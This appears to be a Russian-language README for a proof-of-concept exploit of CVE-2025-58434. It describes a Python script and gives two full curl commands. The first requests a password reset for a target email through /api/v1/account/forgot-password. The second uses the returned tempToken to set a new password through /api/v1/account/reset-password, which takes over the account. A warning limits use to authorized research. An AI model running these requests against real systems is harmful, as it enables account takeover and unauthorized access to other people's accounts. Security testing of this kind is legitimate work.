
CVE-2025-58434 Доказательство концепции
PoC-скрипт на Python для запуска POST /api/v1/account/forgot-password.
⚠️ Только для образовательных и авторизованных исследований безопасности. Запуск этого инструмента против систем, которыми вы не владеете или на тестирование которых у вас нет письменного разрешения, является незаконным.
zaddy6 (Isaac David)arthurgervais (Arthur Gervais)CVE-2025-58434poc.py: запрашивает URL/IP машины, опционально протокол, если указан голый хост/IP, целевой email и пароль; затем отправляет запрос и выводит HTTP-статус, заголовки и тело ответа, аналогично curl -iЗапуск:
python3 poc.py
Затем укажите:
10.10.11.10, http://10.10.11.10 или https://target.examplecurl -i -X POST https://<MACHINE_URL/IP>/api/v1/account/forgot-password \
-H "Content-Type: application/json" \
-d '{"user":{"email":"<[email protected]>"}}'
curl -i -X POST https://<target>/api/v1/account/reset-password \
-H "Content-Type: application/json" \
-d '{
"user":{
"email":"<[email protected]>",
"tempToken":"<tempToken>",
"password":"NewSecurePassword123!"
}
}'